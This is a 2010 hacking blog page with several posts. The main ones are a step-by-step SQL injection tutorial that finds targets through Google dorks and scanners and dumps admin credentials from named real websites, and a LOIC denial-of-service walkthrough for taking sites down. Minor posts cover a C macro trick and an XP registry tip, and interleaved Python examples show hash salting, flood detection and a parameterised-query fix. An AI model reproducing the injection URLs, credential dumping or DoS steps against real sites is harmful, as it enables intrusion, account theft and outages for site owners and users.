Friday, May 14, 2010

How to find sites vulnerable to SQL injection with a scanner

1. Download the software from the link provided below.

2. Run the software.

3. Now select Google.com from the drop-down box under "Options" and select the "Blackie" radio button. You can choose any radio button, but Blackie has given the best results in my experience.

4. Under "Website and Search Engine Dork", select any dork you want. I have selected "article.php?id=". (A dork is simply a search string that matches pages with a particular URL pattern; see the earlier article "SQL injection" on this blog for more on Google dorks.)

5. Now hit "Go" and you will see a list of candidate websites that match the dork. Hit "Clean Bad URL's" and then "Exploit URL". A Google hit only means the URL has the right shape; the tool still has to test each one before it can be called vulnerable.


6. SQL Scanner will then display the final list of URLs that responded as vulnerable. Simply click on any URL. I have used

http://www.michaelpollan.com/article.php?id=80%27

and you can see the results.

The %27 at the end is a URL-encoded single quote. Because the site answers it with a database error, the quote is reaching the SQL query unescaped, so the id parameter is injectable and you can go on to attack the site. Bear in mind that a site which hides database errors shows nothing here even if it is vulnerable, so a clean page is not proof that a site is safe.

7. Now use the site found above as the target for a second tool, SQLI Helper. The remaining steps use their own numbering.

1. Download SQLI Helper from the link provided below.

2. Not every site is injectable, so pick a target with a real vulnerability. SQLI Helper works on pages that take a numeric record ID, so while looking for candidates search for URLs of the form "article.php?id=[number]".

3. Confirm the vulnerability by hand before running the tool. Let's take the example I will use in the rest of this article:

http://encycl.anthropology.ru/article.php?id=1

Check whether it can be injected by entering

http://encycl.anthropology.ru/article.php?id='1

in the address bar and hitting enter. You will get an error message like:

Query failed.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'1 ORDER BY lastname' at line 1 SELECT * FROM person_old WHERE id=\'1 ORDER BY lastname

The error echoes the query itself (SELECT * FROM person_old WHERE id='1 ORDER BY lastname), so you can see the quote being spliced straight into the SQL text and breaking the WHERE clause. If you get an error like this, the site can be attacked with this method and you can move on to the tool.

4. Run SQLI Helper on your computer.

5. In the target field, enter http://encycl.anthropology.ru/article.php?id=1 (the URL you just confirmed as injectable) and hit "Inject".

6. SQLI Helper will work out the number of columns and you will see something like this:

7. Hit "Get Database" to list the databases:

8. Select any entry under "Database Name" and click "Get Tables".

9. Now select a table and hit "Get Columns". I have selected "user", since that is where the user ID and password needed for login should be.

10. Now that you know the "user" table has the columns "usr_login" and "usr_pass", select them and hit "Dump Now".

11. You will get values like these:

12. The values you get are hashes, not passwords, so you have to crack them to obtain a login and password. For this, go to http://www.md5crack.com/ and submit the hash with the "Crack that hash baby" button. The service looks the hash up in a precomputed table of common passwords, so it only succeeds for passwords that are in that table; a long random password, or a hash that was salted, will not be found this way. Once you have the admin password you can log in to the site.
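To make the last step concrete, here is an added example (my own code, not from this tutorial and not md5crack.com's) of what such a service does: it hashes a wordlist once, then answers each dumped hash by table lookup. The dumped rows and the wordlist are constructed for the demo, not taken from any site. The second half shows why a per-user salt makes that table useless, forcing a separate brute force per hash.

```python
import hashlib
import os


def md5_hex(text):
    """Unsalted MD5 as stored by the site in the tutorial (hex digest, 32 chars)."""
    return hashlib.md5(text.encode()).hexdigest()


# Constructed stand-in for the "Dump Now" output (usr_login, usr_pass).
# The third password is long and random, so no wordlist will contain it.
DUMPED_ROWS = [
    ("admin", md5_hex("password")),        # 5f4dcc3b5aa765d61d8327deb882cf99
    ("editor", md5_hex("letmein")),
    ("backup", md5_hex("7Vq#pLz9!wXr2$Kd")),
]

# A toy wordlist; a real one has millions of entries plus mangling rules.
WORDLIST = ["123456", "password", "qwerty", "letmein", "admin", "welcome"]


def build_lookup(words):
    """What an online MD5 cracker does once, ahead of time: a hash -> plaintext table."""
    return {md5_hex(w): w for w in words}


def crack_hashes(rows, lookup):
    """Answer each dumped hash from the table; hashes not in it stay uncracked."""
    return {login: lookup[h] for login, h in rows if h in lookup}


def salted_md5(password, salt):
    """Per-user salt: the same password hashes differently for every user, so a
    precomputed table is useless and each hash has to be attacked on its own."""
    return hashlib.md5(salt + password.encode()).hexdigest()


def crack_salted(hash_hex, salt, words):
    """With a salt there is no shortcut: re-hash every candidate with this salt."""
    for w in words:
        if salted_md5(w, salt) == hash_hex:
            return w
    return None


if __name__ == "__main__":
    lookup = build_lookup(WORDLIST)
    print(crack_hashes(DUMPED_ROWS, lookup))   # {'admin': 'password', 'editor': 'letmein'}
    salt = os.urandom(8)
    h = salted_md5("password", salt)
    print(h in lookup)                          # False: the table does not know this salt
    print(crack_salted(h, salt, WORDLIST))      # password (found only by re-hashing)
```

The "backup" row stays uncracked because its password is not in the wordlist, which is exactly the limit of lookup services like the one in step 12. Salting only removes the lookup shortcut; a fast hash like MD5 can still be brute-forced per user, which is why sites should store passwords with a slow, salted algorithm such as bcrypt instead.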

ENJOY HACKING BUT NOT TO HARM OTHERS


Monday, May 10, 2010

Denial of Service (DoS) Attack:

A Denial of Service attack floods a target system with more requests, or larger requests, than it can handle, so that it can no longer serve its legitimate users. The flood also congests the network in front of the target. A successful DoS attack crashes the target, forces it to reboot, or at least keeps it from answering other users while the flood lasts.

Step 1: Download the software from http://fairurl.com/10563

Step 2: In the URL field, type the address of the website you want to take down and hit "Lock On".

Step 3: Under Attack Options, set the Timeout value to "9001".

Step 4: Now hit "IMMA CHARGIN MAH LAZER" to start the DoS attack on the website. Keep it running and the site will go down after some time, provided your traffic is enough to overwhelm it.



Note: Run from a single computer or a single instance, this DoS attack will hardly ever work against a site of any size. It becomes effective when the attack is run from many computers at once, with several instances of LOIC on each. Also be aware that LOIC does nothing to hide the source of the traffic: every request carries your real IP address, so the target's logs show exactly where the attack came from.
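Seen from the other side, a single-source flood like the one above is easy to pick out of a web server's access log, which is why the note says it rarely works from one machine. Here is an added example of that detection (my own code, not part of the original post and not LOIC's): it parses common-format log lines and keeps a per-IP sliding window, flagging any source that exceeds a request threshold within the window. The log lines are constructed for the demo, with 198.51.100.7 playing the LOIC client.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Common/combined log format: ip ident user [time] "request" status bytes
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) (\d+|-)')


def parse_line(line):
    """Return (ip, timestamp, method, path, status) or None for an unparseable line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status, _ = m.groups()
    return ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), method, path, int(status)


def flag_floods(lines, window_s=10, threshold=50):
    """Per-source sliding window over a time-ordered log.
    Returns {ip: peak requests seen inside one window} for every ip above threshold."""
    recent = defaultdict(deque)
    peaks = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts = rec[0], rec[1]
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:   # drop entries older than the window
            q.popleft()
        if len(q) > threshold:
            peaks[ip] = max(peaks.get(ip, 0), len(q))
    return peaks


def constructed_log():
    """Constructed sample, not a real capture: a visitor at 203.0.113.5 loading a
    page every five seconds, and from second 5 on a LOIC-style client at
    198.51.100.7 hammering one URL thirty times a second."""
    lines = []
    for sec in range(20):
        ts = f"10/May/2010:12:00:{sec:02d} +0000"
        if sec % 5 == 0:
            lines.append(f'203.0.113.5 - - [{ts}] "GET /index.php HTTP/1.1" 200 5120')
        if sec >= 5:
            lines.extend([f'198.51.100.7 - - [{ts}] "GET / HTTP/1.0" 200 5120'] * 30)
    return lines


if __name__ == "__main__":
    for ip, peak in flag_floods(constructed_log()).items():
        print(f"{ip}: {peak} requests inside a 10s window")   # 198.51.100.7: 330 requests ...
```

The flagged address can then be dropped at the firewall or rate-limited at the web server. This only works against a single source or a handful of them; the distributed version the note describes spreads the load below any per-IP threshold and needs other signals (identical request patterns, geography, upstream filtering) to separate from real traffic.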

So friends, I hope you now have a good understanding of the Denial of Service attack and how to take a website down with it. If you have any problem using Low Orbit Ion Cannon to run the attack, mention it in the comments.

Enjoy the Denial of Service (DoS) attack...


C Program Without a Main Function

How do you write a C program without a main function? Is it possible at all? Yes, a C program can appear to have no main function. Here is the code of such a program:

#include <stdio.h>
#define decode(s,t,u,m,p,e,d) m##s##u##t
#define begin decode(a,n,i,m,a,t,e)

int begin()
{
    printf(" hello ");
    return 0;
}

Does the above program run without a main function? Yes, it compiles and runs perfectly well. But how? What is the logic behind it? How can a C program work without main?

Here we are using the preprocessor directive #define with arguments to give the impression that the program has no main. In reality it does: the main function is simply hidden behind a macro.

The '##' operator is called the token-pasting (or token-merging) operator. It joins two or more tokens into a single token.

NOTE: The preprocessor is the program that processes the source code before compilation.

Look at the 2nd line of the program:

#define decode(s,t,u,m,p,e,d) m##s##u##t

What is the preprocessor doing here? The macro decode(s,t,u,m,p,e,d) expands to "msut" (the ## operator merges m, s, u and t into msut). In other words, when you pass (s,t,u,m,p,e,d) as arguments, it merges the 4th, 1st, 3rd and 2nd of them; the other three (p, e, d) are ignored.

Now look at the third line of the program:

#define begin decode(a,n,i,m,a,t,e)

Here the preprocessor replaces the macro "begin" with the expansion decode(a,n,i,m,a,t,e). According to the macro definition on the previous line, the 4th, 1st, 3rd and 2nd arguments are merged. In the argument list (a,n,i,m,a,t,e) those are 'm', 'a', 'i' and 'n'.

So the line "int begin()" is replaced by "int main()" by the preprocessor before the program is passed on to the compiler. That's it.

The bottom line is that there can never be a (hosted) C program without a main function. Here we are just playing a trick that makes us believe the program runs without main; in reality there is a hidden main function in the program. We use the preprocessor directive to replace the word "begin" with "main". In simple words, int begin() = int main().


Let's see how the preprocessor replaces begin with main.

When the preprocessor scans the source code it encounters the word "begin" in the line int begin(). According to the macro definition on the third line, "begin" is expanded into decode(a,n,i,m,a,t,e).
According to the macro definition on the second line, decode(a,n,i,m,a,t,e) is in turn expanded into m##a##i##n (the 4th, 1st, 3rd and 2nd arguments), which the ## operator pastes into main.

Hence in the expanded source code (the code after preprocessing, as handed to the compiler) "begin" has been replaced by "main". You can see this for yourself by running only the preprocessor, with gcc -E, and reading the output.



Sunday, May 9, 2010

Change the Default Location for Installing Programs

As you know, XP uses the C:\Program Files directory as the default base directory into which new programs are installed. You can change the default installation drive and/or directory with a Registry hack. Run the Registry Editor and go to

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion

Look for the value named ProgramFilesDir.

By default, the value is C:\Program Files.

Edit the value to any valid drive or folder.

XP will now offer that location as the default installation directory for new programs. This is useful when your C: drive is full and you want new installs to go elsewhere without choosing the folder by hand every time. Two caveats: programs that are already installed stay where they are, and installers that hard-code C:\Program Files will ignore the new value. Export the key before editing it so you can restore the original setting.

SQL INJECTION TO HACK WEBSITE

1. How do I check whether a website is vulnerable to SQL Injection?
A:
On most websites you read that you should add "'" at the end of the URL (without the quotes), and that an error means the website is vulnerable to SQL Injection. Having spent some time in penetration testing, I would rather tell you that this test is not decisive. Many applications escape quotes (with addslashes or magic_quotes) while still pasting numeric parameters into the query unquoted, so the quote test misses them; and a site that hides database errors shows nothing either way.

The better check is to add "+order+by+6753" at the end of the URL. No real query selects anywhere near 6753 columns (it is rare to see more than 100), so ORDER BY 6753 is guaranteed to fail; the point is not the number but whether that failure produces a database error in the page. If it does, the parameter is being spliced into SQL and the WEBSITE IS VULNERABLE. This check needs no quote, so it works even where quotes are escaped.

To test for SQL Injection the website must take a parameter that selects a specific record, e.g. "website.com/index.php?page=11", where the site pulls up page number 11. To check whether that parameter is vulnerable, try the following URL: "website.com/index.php?page=11+order+by+6753".

2. How do I find vulnerable websites?
A: Google is the best friend of hackers, and when I say this, I really mean it. There is something called "Google dorks": search strings that make Google return a specific group of pages. Here are some Google dorks you can try to find candidate websites:
a. inurl:index.php?page=
b. inurl:members.php?member=
c. inurl:index.php?id=
d. inurl:articles.php?page=

These find websites that take a record identifier in the URL and are therefore working with an SQL database at the backend. Some of them may be vulnerable to SQL Injection; put "order+by+6753" at the end of the URL to check each one.

Step 1 : Finding Vulnerable Page.

Let's start. The website I will test today is www.RfidUpdate.com, so open it in the browser. A little background: RFID means "radio frequency identification". On the right-hand side the site offers a subscription. That tells you that when you subscribe, your e-mail address has to be stored somewhere, so the site has a database. Now we know the website is backed by an SQL database, and we are on the right track.

As I wrote earlier, to perform an SQL Injection we have to find a page with "something.php?id=2121" at the end of the URL, so we will look for such a page on RfidUpdate.com. Exploring the site a bit, I found one. Its URL is

http://www.rfidupdate.com/articles/index.php?id=1563

So now we know the site has an SQL database and we have the page to start with.

Let's check whether the website is vulnerable to SQL injection by adding "+order+by+6753--" as described earlier. (MySQL only treats "--" as a comment when it is followed by a space, so if the plain "--" form fails, try "--+", which decodes to "-- ".)

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+6753--

You should now see an error which says:
"Error 1054: Unknown column '6753' in 'order clause'"

The database is telling us "there is no such column". The error text itself does not matter; what matters is that a database error reached the page, which means our input went straight into the SQL query and the database is effectively talking to us directly. So there is a good chance we can exploit it.

Step 2 : Finding the Number of Columns.

Next we find out how many columns this page's query selects. Instead of 6753 we start with 1, then 5, then 10, and so on, until we get an error. Try the following URL:

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+1--

The page loads fine, which means the query has at least 1 column. Now try 5:

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+5--

Same thing. Now try 10:

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+10--

Still no error. Try 15:

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+15--

Still no error :( , try 20:

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+20--

WHOA! We got the error, which means the number of columns is between 15 and 19. So let's try 16:

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+16--

YAY! 16 errors as well, and 15 did not, so the query selects exactly 15 columns. Now let's move further.

Step 3 : Using "Union Select All".

Now we append a second SELECT with 15 placeholder values and see which of them the page shows. The URL is:

http://www.rfidupdate.com/articles/index.php?id=-1563+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--

FYI: note the "-" I added before 1563. id=-1563 matches no article, so the first SELECT returns nothing and the page renders the row our UNION supplies instead.

The page now looks broken, and of the placeholder numbers only "7" appears on it. That column is the one the page displays, so it becomes the base of the attack: everything from here on is done through column number 7.

Let's find out more about the DATABASE the website is using. To do this, replace column 7 with @@version (without quotes, of course):

http://www.rfidupdate.com/articles/index.php?id=-1563+union+all+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13,14,15--

This is what you should see now:
5.0.67-community

So the site runs MySQL 5.0, which has everything the next step needs (group_concat and 0x hex literals). Now try the following URL to move further.

http://www.rfidupdate.com/articles/index.php?id=-1563+union+all+select+1,2,3,4,5,6,group_concat(ru_Admin_username,0x3a,ru_Admin_password),8,9,10,11,12,13,14,15+from%20ru_Admin--

What we did is replace column 7 with group_concat(ru_Admin_username,0x3a,ru_Admin_password), which joins every username and password from the ru_Admin table into one string with 0x3a (the hex code for ":") between them, and add "from ru_Admin" at the end so the UNION selects from that table.

VOILA! What you are looking at now is the "admin" username and password, in the format

username : password

admin:admRIvuxHahkQ

FYI: Wherever you see "%20" in the URL, that is a space in the address bar ("+" does the same job).

So you have the password now; what you do with it is up to you.
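The three steps above, and the single-quote check from the SQL scanner post earlier on this page, are reproduced here as an added example against a local SQLite database (my own code, not the tutorial author's; the schema, table names and rows are invented for the demo). SQLite's error texts differ from MySQL's and it has no @@version, but the mechanism is identical: an id parameter pasted into the query text, a probe that produces a database error, the ORDER BY walk to count columns, and a UNION with a negative id to read another table through the displayed column. The parameterised lookup at the end is the fix.

```python
import sqlite3

# Constructed demo schema: a three-column article table (the page's site had
# fifteen) and an admin table. Names and rows are invented for this example.
SCHEMA = """
CREATE TABLE articles (id INTEGER, title TEXT, body TEXT);
INSERT INTO articles VALUES (1563, 'RFID tags in retail', 'article body');
CREATE TABLE admin_user (username TEXT, password TEXT);
INSERT INTO admin_user VALUES ('admin', 'demo-hash');
"""


def open_demo_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, raw_id):
    """The bug the tutorial exploits: the id from the URL is pasted into the SQL text."""
    sql = "SELECT id, title, body FROM articles WHERE id=" + raw_id
    return conn.execute(sql).fetchall()


def safe_lookup(conn, raw_id):
    """The fix: check the type, then bind the value. A bound value cannot change
    the query's structure, so ORDER BY / UNION text in it is just a bad number."""
    return conn.execute(
        "SELECT id, title, body FROM articles WHERE id=?", (int(raw_id),)
    ).fetchall()


def probe(conn, payload):
    """Send one payload as the id and report what the page would show: rows or a DB error."""
    try:
        return "ok", vulnerable_lookup(conn, payload)
    except sqlite3.Error as exc:
        return "error", str(exc)


def count_columns(conn, base_id, limit=50):
    """The ORDER BY walk: the last n that does not error is the number of selected columns."""
    for n in range(1, limit + 1):
        status, _ = probe(conn, f"{base_id} ORDER BY {n}")
        if status == "error":
            return n - 1
    return None  # no error up to `limit`: more columns than that, or errors are hidden


def union_dump(conn, base_id, ncols, display_col, expr, from_table):
    """The UNION step: a negative id matches nothing, so the only row rendered is
    the one our SELECT supplies, with `expr` in the column the page displays."""
    cols = [str(i + 1) for i in range(ncols)]
    cols[display_col] = expr
    payload = f"-{base_id} UNION ALL SELECT {','.join(cols)} FROM {from_table}"
    status, rows = probe(conn, payload)
    if status != "ok" or not rows:
        return None
    return rows[0][display_col]


if __name__ == "__main__":
    db = open_demo_db()
    print(probe(db, "1563'"))                # ('error', 'unrecognized token: "\'"')
    print(probe(db, "1563 ORDER BY 6753"))   # ('error', '1st ORDER BY term out of range ...')
    n = count_columns(db, "1563")            # 3
    print(union_dump(db, "1563", n, 1,
                     "group_concat(username || ':' || password)", "admin_user"))  # admin:demo-hash
    print(safe_lookup(db, "1563"))           # [(1563, 'RFID tags in retail', 'article body')]
```

Run as a script it prints the single-quote error, the ORDER BY error, a column count of 3, and the admin row read through the second (displayed) column; the same payloads fed to safe_lookup either return nothing or are rejected by int() before any SQL is built. group_concat with "||" is SQLite's spelling of the MySQL group_concat(a,0x3a,b) used in the tutorial.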

So this is the way to perform an SQL Injection attack. You can try your own experiments with the Google dorks I posted at the beginning. Use it the way you want, but keep in mind that if you know 80/100, there are people out there who know 90/100. So secure yourself first, and only try these attacks with the permission of the site owners.

Thank you all for reading this tutorial; I am sure it helped. If you have any more questions, post them in the comments on this post.

Enjoy Ethical hacking ;)